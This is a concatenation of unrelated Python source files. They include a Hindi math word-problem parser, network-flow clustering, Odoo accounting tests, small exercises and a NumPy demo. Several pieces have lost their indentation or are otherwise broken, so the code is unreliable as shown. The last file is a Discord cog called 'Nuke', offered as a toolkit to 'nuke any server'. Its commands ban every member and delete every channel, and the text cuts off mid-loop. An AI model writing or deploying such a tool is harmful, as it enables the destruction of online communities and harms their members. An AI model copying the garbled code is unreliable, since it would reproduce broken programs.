    # print sentence
    # indexOfVerb = -1
    # indexOfQuantity = -1
    index = 0
    indexOfPronoun = -1
    valueEncountered = []
    integerWordDict = OrderedDict()
    listOfIndicesOfProperNouns = []
    namesOfProperNouns = []
    verbsFound = []
    val = 0
    for key, value in sentence.iteritems():
        integerWordDict[index] = key
        if value == 'PRP':
            indexOfPronoun = index
        if value == 'NNP' :
            listOfIndicesOfProperNouns.append(index)
            namesOfProperNouns.append(key)
        if value in verbTags:
            # print key
            verbsFound.append(key)
        if value == 'QC':
            # indexOfQuantity = index
            val = convertToEnglish(key)
            valueEncountered.append(val)
        index += 1
    actionToBePerformed = categoriseVerb(verbsFound)
    # Depending on action to be performed, there will be two operations
    actionInOneContainer, actionInSecondContainer = twoActions(actionToBePerformed)
    if len(listOfIndicesOfProperNouns)==2:
        # name name
        firstName = namesOfProperNouns[0]
        secondName = namesOfProperNouns[1]
        if firstName == question.container1[sentence_number].name:
            q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
            question.container1[sentence_number].quantity = q1
        else:
            q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInSecondContainer,val)
            question.container2[sentence_number].quantity = q2
        if firstName == question.container2[sentence_number].name:
            q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInOneContainer,val)
            question.container2[sentence_number].quantity = q2
        else:
            q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInSecondContainer, val)
            question.container1[sentence_number].quantity = q1
    elif len(listOfIndicesOfProperNouns)==1 and indexOfPronoun!= -1:
        # name pronoun
        q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
        question.container1[sentence_number].quantity = q1
        q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInSecondContainer,val)
        question.container2[sentence_number].quantity = q2
    elif indexOfPronoun!=-1:
        # only pronoun
        q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
        question.container1[sentence_number].quantity = q1
    elif indexOfPronoun == -1:
        # only noun
        nameFound = namesOfProperNouns[0]
        if nameFound == question.container1[sentence_number].name:
            q1 = modifyQuantityOfCurrentContainer(question.container1[sentence_number].quantity, actionInOneContainer, val)
            question.container1[sentence_number].quantity = q1
        else:
            q2 = modifyQuantityOfCurrentContainer(question.container2[sentence_number].quantity, actionInOneContainer, val)
            question.container2[sentence_number].quantity = q2
def modifyQuantityOfCurrentContainer(quantity_of_container, action, value_to_add_delete):
    """Extend a container's running quantity expression.

    POSITIVE appends ' + v', NEGATIVE appends ' - v'; any other action
    restarts the expression at v.  Always returns a string.
    """
    suffix_by_action = {"POSITIVE": " + ", "NEGATIVE": " - "}
    op = suffix_by_action.get(action.strip(" "))
    if op is None:
        return str(value_to_add_delete)
    return str(quantity_of_container) + op + str(value_to_add_delete)
def twoActions(actionToBePerformed):
    """Map a verb category (0-4) to the signed effect on each container.

    0 observation, 1 construct, 2 destroy, 3 transfer one way, anything
    else transfers the other way.  Returns a (first, second) pair of
    'NONE'/'POSITIVE'/'NEGATIVE'.
    """
    effects = {
        0: ("NONE", "NONE"),
        1: ("POSITIVE", "POSITIVE"),
        2: ("NEGATIVE", "NEGATIVE"),
        3: ("POSITIVE", "NEGATIVE"),
    }
    return effects.get(actionToBePerformed, ("NEGATIVE", "POSITIVE"))
def categoriseVerb(verbsFound):
    """Pick the most likely verb category (0-4) for the sentence.

    For each category, multiply the per-verb relative frequencies from
    trainingDictionary (index 0-4 are category counts, index 5 the
    total).  Unknown verbs contribute nothing.  Ties resolve to the
    lowest category index.
    """
    category_scores = []
    for category in range(5):
        score = 1.0
        for verb in verbsFound:
            if verb in trainingDictionary:
                counts = trainingDictionary[verb]
                score *= counts[category] / counts[5]
        category_scores.append(score)
    # index() of the max returns the first (lowest) best category.
    return category_scores.index(max(category_scores))
def containerFirstSentence(sentence, question):
    """Initialise the question's containers from the first sentence.

    With a single proper noun, one real container plus an empty second
    container is created; with two proper nouns the sentence is split at
    the second NNP and one container built per person.
    Python 2 code (dict.iteritems()).
    """
    names = set()
    for key, value in sentence.iteritems():
        if value == "NNP":
            names.add(key)
    question.names = names
    if len(names) == 1:
        quantityFlag = False
        entityFlag = False
        name = ""
        quantity = ""
        entity = ""
        attribute = ""
        for key, value in sentence.iteritems():
            # print str(key)+" "+str(value)
            if value == "NNP":
                name = key
            if value == "QC" and isNumber(key):
                quantity = convertToEnglish(key)
                quantityFlag = True
            # Entity/attribute are only picked up after the quantity.
            if quantityFlag and not entityFlag and value == "NN":
                entity = key
                entityFlag = True
            if quantityFlag and not entityFlag and value == "JJ":
                attribute = key
        container = Container(name, entity, attribute, quantity)
        question.addContainer(container)
        # add empty container in second container also
        question.addContainer(Container())
        # container.printContainer()
    else:
        # There are more than two NNP
        integer_word_dict = OrderedDict()
        count = 0
        indexOfFirstNNP = -1
        indexOfSecondNNP = -1
        for key, value in sentence.iteritems():
            integer_word_dict[count] = key
            if value == 'NNP' and indexOfFirstNNP == -1:
                indexOfFirstNNP = count
            elif value == 'NNP' and indexOfFirstNNP != -1:
                indexOfSecondNNP = count
            count += 1
        quantityFlag = False
        entityFlag = False
        name = ""
        quantity = ""
        entity = ""
        attribute = ""
        # First person: words before the second proper noun.
        for i in range(0, indexOfSecondNNP):
            if sentence[integer_word_dict[i]] == "NNP":
                name = integer_word_dict[i]
            if sentence[integer_word_dict[i]] == "QC" and isNumber(integer_word_dict[i]):
                quantity = convertToEnglish(integer_word_dict[i])
                quantityFlag = True
            if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "NN":
                entity = integer_word_dict[i]
                entityFlag = True
            if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "JJ":
                # NOTE(review): 'key' here is left over from the earlier
                # loop -- likely should be integer_word_dict[i]; confirm.
                attribute = key
        container = Container(name, entity, attribute, quantity)
        question.addContainer(container)
        # container.printContainer()
        # Second person: words from the second proper noun onwards.
        # NOTE(review): flags are not reset between the two halves.
        if indexOfSecondNNP!=-1:
            for i in range(indexOfSecondNNP, len(sentence)):
                if sentence[integer_word_dict[i]] == "NNP":
                    name = integer_word_dict[i]
                if sentence[integer_word_dict[i]] == "QC" and isNumber(integer_word_dict[i]):
                    quantity = convertToEnglish(integer_word_dict[i])
                    quantityFlag = True
                if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "NN":
                    entity = integer_word_dict[i]
                    entityFlag = True
                if quantityFlag and not entityFlag and sentence[integer_word_dict[i]] == "JJ":
                    attribute = integer_word_dict[i]
            container = Container(name, entity, attribute, quantity)
            question.addContainer(container)
            # container.printContainer()
def containerOtherSentence(sentence, question, sentence_number):
    """Extend the container history for a follow-up sentence.

    Copies the previous state of container1 forward; then either creates
    a container for a newly introduced person (single-name questions) or
    copies container2's previous state forward as well.
    Python 2 code (dict.iteritems()).
    """
    # find pronoun, noun, verb
    copyConstructorOf1 = Container()
    copyConstructorOf1.copyContainer(question.container1[sentence_number-1])
    # print "first ka copy"
    # copyConstructorOf1.printContainer()
    question.addContainer(copyConstructorOf1)
    # print len(question.names)
    # print "Hah"
    name = ""
    quantity = ""
    entity = ""
    attribute = ""
    quantityFlag = False
    entityFlag = False
    if len(question.names)==1:
        booleanMakeNewContainer = False
        for key, value in sentence.iteritems():
            if value == "NNP" and key not in question.names:
                newName = key
                booleanMakeNewContainer = True
                question.names.add(newName)
            if quantityFlag and not entityFlag and value == "NN":
                entity = key
                entityFlag = True
            if quantityFlag and not entityFlag and value == "JJ":
                attribute = key
        if booleanMakeNewContainer==True:
            # New person starts with unknown quantity "X".
            container = Container(newName, entity, attribute, "X")
            question.addContainer(container)
            # container.printContainer()
    else:
        # Copy second container also that is make container2[1]
        copyConstructorOf2 = Container()
        copyConstructorOf2.copyContainer(question.container2[sentence_number-1])
        # print "second copy"
        # copyConstructorOf2.printContainer()
        question.addContainer(copyConstructorOf2)
def isNumber(num):
    """Return True when *num* is made entirely of Devanagari digits.

    Written for Python 2 byte strings: each Devanagari digit is a 3-byte
    UTF-8 sequence, hence the backwards walk in steps of 3 bytes.
    # NOTE(review): the final isinstance(number, Number) is always True
    # once the loop completes, so the effective result is the digit check.
    """
    numList = ['०','१','२','३','४','५','६','७','८','९']
    number = 0
    multiplier = 1
    for i in range(len(num)-1, -1, -3):
        # 3-byte slice covering one UTF-8 encoded digit.
        digit = num[i-2:i+1]
        if digit not in numList:
            return False
        else:
            number += int(convertToEnglish(digit)) * multiplier
            multiplier *= 10
    return isinstance(number, Number)
def convertToEnglish(num):
    """Translate a Devanagari digit string into ASCII digits.

    Mirrors the Python-2 byte-string layout of the caller: the input is
    consumed in 3-byte chunks, one UTF-8 encoded digit per chunk.
    Returns the ASCII digits as a string.
    """
    digit_map = {'०': '0', '१': '1', '२': '2', '३': '3', '४': '4',
                 '५': '5', '६': '6', '७': '7', '८': '8', '९': '9'}
    pieces = []
    for start in range(0, len(num), 3):
        pieces.append(digit_map[num[start:start + 3]])
    return ''.join(pieces)
if __name__ == "__main__":
main() |
#Rotate Matrix
def generateMatrix(n):
    """Build an n x n test matrix where row i holds i*2, i*2+1, ...,
    i*2 + n - 1 (rows overlap by design)."""
    return [[col + row * 2 for col in range(n)] for row in range(n)]
def rotateMatrix(matrix):
    """Return *matrix* rotated 90 degrees clockwise as a new matrix.

    Row i of the result is column i of the input read bottom-to-top,
    i.e. rotated[i][j] == matrix[n - j - 1][i]; reversing the rows and
    transposing with zip produces exactly that.  Input is untouched.
    """
    return [list(column) for column in zip(*matrix[::-1])]
# Smoke test: build a 3x3 matrix, print it with its dimensions, then
# print its 90-degree clockwise rotation.
m = generateMatrix(3)
print(m , len(m) , len(m[0]))
print(rotateMatrix(m))
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
import seaborn as sns
from sklearn.preprocessing import LabelEncoder
from mpl_toolkits.mplot3d import Axes3D
from sklearn.cluster import KMeans
# Column names for the raw network-flow CSV (CICFlowMeter-style features)
# and for the cluster-assignment CSV, supplied because the files are read
# without headers below.
names = ["ID", "Flow.ID", "Source.IP", "Source.Port", "Destination.IP",
         "Destination.Port", "Protocol", "Timestamp", "Flow.Duration",
         "Total.Fwd.Packets", "Total.Backward.Packets", "Total.Length.of.Fwd.Packets",
         "Total.Length.of.Bwd.Packets", "Fwd.Packet.Length.Max", "Fwd.Packet.Length.Min",
         "Fwd.Packet.Length.Mean", "Fwd.Packet.Length.Std", "Bwd.Packet.Length.Max",
         "Bwd.Packet.Length.Min", "Bwd.Packet.Length.Mean", "Bwd.Packet.Length.Std", "Flow.Bytes.s",
         "Flow.Packets.s", "Flow.IAT.Mean", "Flow.IAT.Std", "Flow.IAT.Max", "Flow.IAT.Min", "Fwd.IAT.Total",
         "Fwd.IAT.Mean", "Fwd.IAT.Std", "Fwd.IAT.Max", "Fwd.IAT.Min", "Bwd.IAT.Total", "Bwd.IAT.Mean", "Bwd.IAT.Std",
         "Bwd.IAT.Max", "Bwd.IAT.Min", "Fwd.PSH.Flags", "Bwd.PSH.Flags", "Fwd.URG.Flags", "Bwd.URG.Flags",
         "Fwd.Header.Length", "Bwd.Header.Length", "Fwd.Packets.s", "Bwd.Packets.s", "Min.Packet.Length",
         "Max.Packet.Length", "Packet.Length.Mean", "Packet.Length.Std", "Packet.Length.Variance",
         "FIN.Flag.Count", "SYN.Flag.Count", "RST.Flag.Count", "PSH.Flag.Count", "ACK.Flag.Count",
         "URG.Flag.Count", "CWE.Flag.Count", "ECE.Flag.Count", "Down.Up.Ratio", "Average.Packet.Size",
         "Avg.Fwd.Segment.Size", "Avg.Bwd.Segment.Size", "Fwd.Header.Length.1", "Fwd.Avg.Bytes.Bulk",
         "Fwd.Avg.Packets.Bulk", "Fwd.Avg.Bulk.Rate", "Bwd.Avg.Bytes.Bulk", "Bwd.Avg.Packets.Bulk",
         "Bwd.Avg.Bulk.Rate", "Subflow.Fwd.Packets", "Subflow.Fwd.Bytes", "Subflow.Bwd.Packets", "Subflow.Bwd.Bytes",
         "Init_Win_bytes_forward", "Init_Win_bytes_backward", "act_data_pkt_fwd", "min_seg_size_forward",
         "Active.Mean", "Active.Std", "Active.Max", "Active.Min", "Idle.Mean", "Idle.Std", "Idle.Max", "Idle.Min", "Label"]
names_id = ["ID", "Cluster"]
df_raw = pd.read_csv('raw_data_remove1st.csv', names=names, low_memory=False)
df_cluster = pd.read_csv('cluster_remove.csv', names=names_id, low_memory=False)
df_cluster.drop('ID', axis=1, inplace=True)
print(df_raw.shape)
print(df_cluster.shape)
df_feature = pd.DataFrame()
df_raw['Flow.ID'] = df_raw['Flow.ID'].astype('category')
df_raw['Source.IP'] = df_raw['Source.IP'].astype('category')
df_raw['Destination.IP'] = df_raw['Destination.IP'].astype('category')
df_raw['Timestamp'] = df_raw['Timestamp'].astype('category')
cat_columns = df_raw.select_dtypes(['category']).columns
df_raw[cat_columns] = df_raw[cat_columns].apply(lambda x: x.cat.codes)
df_feature['Source.IP'] = df_raw['Source.IP']
df_feature['Source.Port'] = df_raw['Source.Port']
df_feature['Destination.IP'] = df_raw['Destination.IP']
df_feature['Destination.Port'] = df_raw['Destination.Port']
df_feature['Protocol'] = df_raw['Protocol']
df_feature['Init_Win_bytes_forward'] = df_raw['Init_Win_bytes_forward']
df_feature['Flow.ID'] = df_raw['Flow.ID']
df_feature['Protocol'] = df_raw['Protocol']
df_feature['min_seg_size_forward'] = df_raw['min_seg_size_forward']
print(df_raw.shape)
data = df_feature.to_numpy()
X = data[:,0:9]
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
sScaler = StandardScaler()
rescaleX = sScaler.fit_transform(X)
pca = PCA(n_components=2)
rescaleX = pca.fit_transform(rescaleX)
principalDf = pd.DataFrame(data = rescaleX, columns = ['principal component 1', 'principal component 2'])
data = principalDf.to_numpy()
plt.clf()
plt.figure()
plt.title('KDD data set - Linear separability')
plt.xlabel('pc1')
plt.ylabel('pc2')
kmeans = KMeans(n_clusters=4,random_state=0).fit(rescaleX)
y_kmeans = kmeans.predict(rescaleX)
#plt.scatter(principalDf.iloc[:,0], principalDf.iloc[:,1], c=y_kmeans, s=50, cmap='viridis')
#centers = kmeans.cluster_centers_
#plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)
from sklearn.metrics.cluster import adjusted_mutual_info_score
ans = df_cluster.to_numpy()
ans = ans.flatten()
kmeans_performance = adjusted_mutual_info_score ( ans,y_kmeans )
print("kmeans_performance: ")
print(kmeans_performance)
print("")
from sklearn.cluster import Birch
brc = Birch(n_clusters=4)
y_brc = brc.fit(rescaleX)
y_brc_ans = y_brc.predict(rescaleX)
birch_performance = adjusted_mutual_info_score ( ans,y_brc_ans )
print("Birch_performance: ")
print(birch_performance)
print("")
from sklearn.cluster import SpectralClustering
'''
spectralA = SpectralClustering(n_clusters=4, affinity='rbf',
assign_labels='kmeans')
y_spectralA = spectralA.fit_predict(rescaleX)
performance2 = adjusted_mutual_info_score ( ans,y_spectralA )
print("SpectralA_performance: ")
print(performance2)
print("")
'''
spectralA = SpectralClustering(n_clusters=4, affinity='rbf',
assign_labels='discretize')
y_spectralB = spectralA.fit_predict(rescaleX)
performance3 = adjusted_mutual_info_score ( ans,y_spectralB )
plt.scatter(principalDf.iloc[:,0], principalDf.iloc[:,1],
c=y_spectralB, s=50, cmap='viridis')
plt.show()
print("SpectralB_performance: ")
print(performance3)
print("")
|
# -*- coding: utf-8 -*-
from unittest.mock import patch
from odoo.addons.account_auto_transfer.tests.account_auto_transfer_test_classes import AccountAutoTransferTestCase
from odoo import fields
from odoo.tests import tagged
# ############################################################################ #
# UNIT TESTS #
# ############################################################################ #
@tagged('post_install', '-at_install')
class MoveModelLineTestCase(AccountAutoTransferTestCase):
    def setUp(self):
        """Extend the shared fixture with the origin accounts used by the
        transfer-model-line tests below."""
        super().setUp()
        self._assign_origin_accounts()
    def test__get_transfer_move_lines_values_same_aaccounts(self):
        """Two transfer model lines whose analytic-account filters overlap:
        the first line should capture both moves (summed), and the second
        should produce no move lines because nothing is left for it."""
        amounts = [4242.42, 1234.56]
        aaccounts = [self._create_analytic_account('ANAL0' + str(i)) for i in range(2)]
        self._create_basic_move(
            cred_account=self.destination_accounts[0].id,
            deb_account=self.origin_accounts[0].id,
            amount=amounts[0],
            deb_analytic=aaccounts[0].id
        )
        self._create_basic_move(
            cred_account=self.destination_accounts[1].id,
            deb_account=self.origin_accounts[0].id,
            amount=amounts[1],
            deb_analytic=aaccounts[1].id
        )
        transfer_model_line_1 = self._add_transfer_model_line(self.destination_accounts[0].id,
                                                              analytic_account_ids=[aaccounts[0].id, aaccounts[1].id])
        transfer_model_line_2 = self._add_transfer_model_line(self.destination_accounts[1].id,
                                                              analytic_account_ids=[aaccounts[0].id])
        transfer_models_lines = transfer_model_line_1 + transfer_model_line_2
        args = [fields.Date.to_date('2019-01-01'), fields.Date.to_date('2019-12-19')]
        res = transfer_models_lines._get_transfer_move_lines_values(*args)
        exp = [{
            'name': 'Automatic Transfer (from account MA001 with analytic account(s): ANAL00, ANAL01)',
            'account_id': self.destination_accounts[0].id,
            'date_maturity': args[1],
            'debit': sum(amounts),
        }, {
            'name': 'Automatic Transfer (entries with analytic account(s): ANAL00, ANAL01)',
            'account_id': self.origin_accounts[0].id,
            'date_maturity': args[1],
            'credit': sum(amounts),
        }]
        self.assertListEqual(exp, res,
                             'Only first transfer model line should be handled, second should get 0 and thus not be added')
def test__get_transfer_move_lines_values(self):
amounts = [4242.0, 1234.56]
aaccounts = [self._create_analytic_account('ANAL0' + str(i)) for i in range(3)]
self._create_basic_move(
cred_account=self.destination_accounts[0].id,
deb_account=self.origin_accounts[0].id,
amount=amounts[0],
deb_analytic=aaccounts[0].id
)
self._create_basic_move(
cred_account=self.destination_accounts[1].id,
deb_account=self.origin_accounts[0].id,
amount=amounts[1],
deb_analytic=aaccounts[2].id
)
transfer_model_line_1 = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccounts[0].id, aaccounts[1].id])
transfer_model_line_2 = self._add_transfer_model_line(self.destination_accounts[1].id,
analytic_account_ids=[aaccounts[2].id])
transfer_models_lines = transfer_model_line_1 + transfer_model_line_2
args = [fields.Date.to_date('2019-01-01'), fields.Date.to_date('2019-12-19')]
res = transfer_models_lines._get_transfer_move_lines_values(*args)
exp = [
{
'name': 'Automatic Transfer (from account MA001 with analytic account(s): ANAL00, ANAL01)',
'account_id': self.destination_accounts[0].id,
'date_maturity': args[1],
'debit': amounts[0],
},
{
'name': 'Automatic Transfer (entries with analytic account(s): ANAL00, ANAL01)',
'account_id': self.origin_accounts[0].id,
'date_maturity': args[1],
'credit': amounts[0],
},
{
'name': 'Automatic Transfer (from account MA001 with analytic account(s): ANAL02)',
'account_id': self.destination_accounts[1].id,
'date_maturity': args[1],
'debit': amounts[1],
},
{
'name': 'Automatic Transfer (entries with analytic account(s): ANAL02)',
'account_id': self.origin_accounts[0].id,
'date_maturity': args[1],
'credit': amounts[1],
}
]
self.assertListEqual(exp, res)
@patch('odoo.addons.account_auto_transfer.models.transfer_model.TransferModel._get_move_lines_base_domain')
def test__get_move_lines_domain(self, patched):
return_val = [('bla', '=', 42)]
# we need to copy return val as there are edge effects due to mocking
# return_value is modified by the function call)
patched.return_value = return_val[:]
args = [fields.Date.to_date('2019-01-01'), fields.Date.to_date('2019-12-19')]
aaccount_1 = self._create_analytic_account('ANAL01')
aaccount_2 = self._create_analytic_account('ANAL02')
percent = 42.42
analytic_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccount_1.id, aaccount_2.id])
percent_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[1].id, percent=percent)
anal_res = analytic_transfer_model_line._get_move_lines_domain(*args)
anal_expected = return_val + [('analytic_account_id', 'in', [aaccount_1.id, aaccount_2.id])]
patched.assert_called_once_with(*args)
self.assertListEqual(anal_res, anal_expected)
patched.reset_mock()
perc_res = percent_transfer_model_line._get_move_lines_domain(*args)
patched.assert_called_once_with(*args)
self.assertListEqual(perc_res, patched.return_value)
def test__get_origin_account_transfer_move_line_values(self):
percent = 92.42
transfer_model_line = self._add_transfer_model_line(self.destination_accounts[0].id, percent=percent)
origin_account = self.origin_accounts[0]
amount = 4200.42
is_debit = True
write_date = fields.Date.to_date('2019-12-19')
params = [origin_account, amount, is_debit, write_date]
result = transfer_model_line._get_origin_account_transfer_move_line_values(*params)
expected = {
'name': 'Automatic Transfer (to account %s)' % self.destination_accounts[0].code,
'account_id': origin_account.id,
'date_maturity': write_date,
'credit' if is_debit else 'debit': amount
}
self.assertDictEqual(result, expected)
def test__get_destination_account_transfer_move_line_values(self):
aaccount_1 = self._create_analytic_account('ANAL01')
aaccount_2 = self._create_analytic_account('ANAL02')
percent = 42.42
analytic_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccount_1.id, aaccount_2.id])
percent_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[1].id, percent=percent)
origin_account = self.origin_accounts[0]
amount = 4200
is_debit = True
write_date = fields.Date.to_date('2019-12-19')
params = [origin_account, amount, is_debit, write_date]
anal_result = analytic_transfer_model_line._get_destination_account_transfer_move_line_values(*params)
aaccount_names = ', '.join([aac.name for aac in [aaccount_1, aaccount_2]])
anal_expected_result = {
'name': 'Automatic Transfer (from account %s with analytic account(s): %s)' % (
origin_account.code, aaccount_names),
'account_id': self.destination_accounts[0].id,
'date_maturity': write_date,
'debit' if is_debit else 'credit': amount
}
self.assertDictEqual(anal_result, anal_expected_result)
percent_result = percent_transfer_model_line._get_destination_account_transfer_move_line_values(*params)
percent_expected_result = {
'name': 'Automatic Transfer (%s%% from account %s)' % (percent, self.origin_accounts[0].code),
'account_id': self.destination_accounts[1].id,
'date_maturity': write_date,
'debit' if is_debit else 'credit': amount
}
self.assertDictEqual(percent_result, percent_expected_result)
|
# Multiplication-table ("gugudan") printer: ask the user for a table
# number, then print that table from 1 through 9.
dan = int(input("출력하고 싶은 구구단의 단숫자를 입력하숑 : "))
print(dan, "단")
num = 1
while num < 10:
    print(dan, "*", num, "=", dan * num)
    num += 1
|
#import sys
#input = sys.stdin.readline
from copy import deepcopy
def solve(k):
    """Return the k-th smallest (1-indexed) "staircase-like" number.

    Seed candidates are the digits 1..9.  Each of 10 generations appends
    one more digit that differs from the current last digit by at most 1,
    clamped at 0 and 9 (a 0 may be followed only by 0 or 1, a 9 only by
    9 or 8), producing candidates of up to 11 digits.  All generated
    numbers are collected, sorted ascending, and the k-th is returned.
    """
    generations = [[1, 2, 3, 4, 5, 6, 7, 8, 9]]
    for i in range(10):
        nxt = []
        for num in generations[i]:
            last = num % 10
            if last == 0:
                # last digit 0: can only repeat 0 or step up to 1
                nxt.append(num * 10)
                nxt.append(num * 10 + 1)
            elif last == 9:
                # last digit 9: can only repeat 9 or step down to 8
                nxt.append(num * 10 + 9)
                nxt.append(num * 10 + 8)
            else:
                nxt.append(num * 10 + last)
                nxt.append(num * 10 + last + 1)
                nxt.append(num * 10 + last - 1)
        generations.append(nxt)
    candidates = []
    for gen in generations:
        candidates.extend(gen)
    candidates.sort()
    return candidates[k - 1]
def main():
    """Read K from stdin and print the K-th candidate number."""
    K = int(input())
    print(solve(K))
if __name__ == '__main__':
    main()
|
# Demonstration of basic NumPy linear-algebra operations on a 3x3 matrix.
# NOTE(review): ported from Python 2 (print statements; bare `input()`
# which eval'd to an int) to Python 3 syntax -- the original could not
# run on Python 3 at all.  The matrix [[1,2,3],[4,5,6],[7,8,9]] is
# singular, so the determinant is ~0 and the printed "inverse" is
# numerically meaningless.
import numpy as np

a = np.matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
m = np.matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
b = m  # b aliases m (no copy); fine here since m is never mutated
print("MATRIX IS:\n", m)
print("DETERMINANT OF MATRIX IS:\n", np.linalg.det(m))
print("INVERSE OF MATRIX IS:\n", np.linalg.inv(m))
print("NORM OF MATRIX IS:\n", np.linalg.norm(m))
print("RANK OF MATRIX IS:\n", np.linalg.matrix_rank(m))
print("TRACE OF MATRIX IS:\n", np.trace(m))
# int() replaces Python 2's implicit eval of the typed input
p = int(input("ENTER POWER OF MATRIX:\n"))
print("POWER OF MATRIX IS:\n", np.linalg.matrix_power(m, p))
print("TRANSPOSE OF MATRIX IS:\n", np.transpose(m))
print("EIGEN VALUES OF MATRIX IS:\n", np.linalg.eigvals(m))
print("MAXIMUM OF MATRIX IS:\n", np.max(a))
print("MINIMUM OF MATRIX IS:\n", np.min(a))
print("ADDITION OF TWO MATRICES A & B IS:\n", np.add(a, b))
print("SUBTRACTION OF MATRIX B FROM MATRIX A IS:\n", np.subtract(a, b))
print("MULTIPLICATION OF MATRICES A & B IS :\n", np.multiply(a, b))
print("DIVISION OF MATRIX A BY MATRIX B IS:\n", np.divide(a, b))
print("DOT PRODUCT OF BOTH MATRICES:\n", np.dot(a, b))
print("SQUARE ROOT OF MATRIX B IS:\n", np.sqrt(b))
|
class Dog:
    """A simple virtual pet with hunger, energy and happiness stats.

    All stats are intended to be on a 0-10 scale.  Note the model treats
    ``hunger`` as "fullness": playing and napping lower it, feeding
    raises it.  Each action returns a human-readable status string.
    """
    def __init__(self, name, energy, hunger):
        """Create a dog with the given name and starting energy/hunger."""
        self.hunger = hunger
        self.energy = energy
        self.happiness = 5  # every dog starts out moderately happy
        self.name = name
    def play(self):
        """Play if the dog has energy and food in its belly.

        Raises happiness, lowers hunger and energy by 1 each; otherwise
        returns a message suggesting a nap or food.
        """
        if self.energy > 0 and self.hunger > 0:
            self.happiness += 1
            self.hunger -= 1
            self.energy -= 1
            status = self.name + " played and it was fun."
        else:
            status = "Erm, " + self.name + " needs to not play right now. Maybe try a nap or some food?"
        return status
    def nap(self):
        """Nap if the dog is tired (energy < 5) and not starving.

        Napping costs 1 happiness and 1 hunger but restores 2 energy.
        """
        if self.hunger > 0 and self.energy < 5:
            self.happiness -= 1
            self.hunger -= 1
            self.energy += 2
            status = self.name + " took a nap and is now well rested!"
        else:
            # BUGFIX: "You're dog" -> "Your dog" (possessive, not "you are")
            status = "Your dog has too much energy to sleep right now. Maybe try playing with it?"
        return status
    def feed(self):
        """Feed the dog unless it is already full (hunger == 10).

        Feeding raises hunger (fullness), happiness and energy by 1 each.
        """
        if self.hunger < 10:
            self.hunger += 1
            self.happiness += 1
            self.energy += 1
            status = self.name + " ate some dog treats for lunch."
        else:
            # BUGFIX: "You're dog" -> "Your dog" (possessive, not "you are")
            status = "Your dog is too full to eat more. Try tiring it out by playing with it!"
        return status
    def stats(self):
        """Return a multi-line summary of the dog's current stats."""
        info = "Name: " + self.name
        info += "\nEnergy: " + str(self.energy)
        info += "\nHappiness: " + str(self.happiness)
        info += "\nHunger: " + str(self.hunger)
        return info
# Interactive demo loop for the Dog class: repeatedly show dog1's stats
# and run the command the user types, until they type "nothing".
dog1 = Dog("Tetris", 8, 2)
dog2 = Dog("Bat", 5, 7)
# Map each command word to the bound method that implements it.
actions = {"play": dog1.play, "nap": dog1.nap, "feed": dog1.feed}
while True:
    print(dog1.stats())
    choice = input("What would you like to do with your dog? ")
    if choice == "nothing":
        print("Are you done caring for your dog already? OK. ")
        break
    handler = actions.get(choice)
    if handler is None:
        print("You can't do that.")
    else:
        print(handler())
|
counter = 1
def test():
test()
print("Hi")
counter += 1
test()
|
#!/usr/bin/python
import numpy as np
def nonlin(x, deriv=False):
    """Sigmoid activation function.

    With deriv=True, returns the sigmoid derivative expressed in terms
    of a sigmoid *output* x, i.e. x * (1 - x), for use in
    backpropagation.
    """
    if deriv:
        return x * (1 - x)
    sigmoid = 1 / (1 + np.exp(-x))
    return sigmoid
# Training set: 4 samples x 3 features (the third column is a constant 1
# acting as a bias input).
# BUGFIX: a missing comma between [1,0,1] and [1,1,1] made the original
# line index a list with a tuple -- a TypeError at runtime.
x = np.array([[0, 0, 1], [0, 1, 1], [1, 0, 1], [1, 1, 1]])
# Target output, one row per sample.
y = np.array([[0], [1], [1], [0]])
np.random.seed(1)  # deterministic weight initialisation for reproducibility
# Synapse weight matrices (3->4 hidden, 4->1 output), uniform in [-1, 1)
syn0 = 2 * np.random.random((3, 4)) - 1
syn1 = 2 * np.random.random((4, 1)) - 1
# training loop not implemented in this snippet
|
from discord.ext import commands
import discord
class Nuke(commands.Cog, name="Nuke"):
"""A simple toolkit for everyone, that can nuke any server, if provided proper permissions. :')"""
def __init__(self, bot):
self.bot = bot
@commands.command(name="banmembers", aliases=["banm", "bmembers", "bm"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(ban_members=True, add_reactions=True)
async def _bm(self, ctx, *, remark:str=None):
"""
This command will ban all the members from the server :)
Usage:
[p]banmembers [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if len(remark) > 20: remark = remark[:20:]
for member in ctx.guild.members:
try:
await member.ban(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="deletechannels", aliases=["deletec", "dchannels", "dc"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_channels=True, add_reactions=True)
async def _dc(self, ctx, *, remark:str=None):
"""
This command will delete all the channels from the server :)
Usage:
[p]deletechannels [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for channel in ctx.guild.channels:
try:
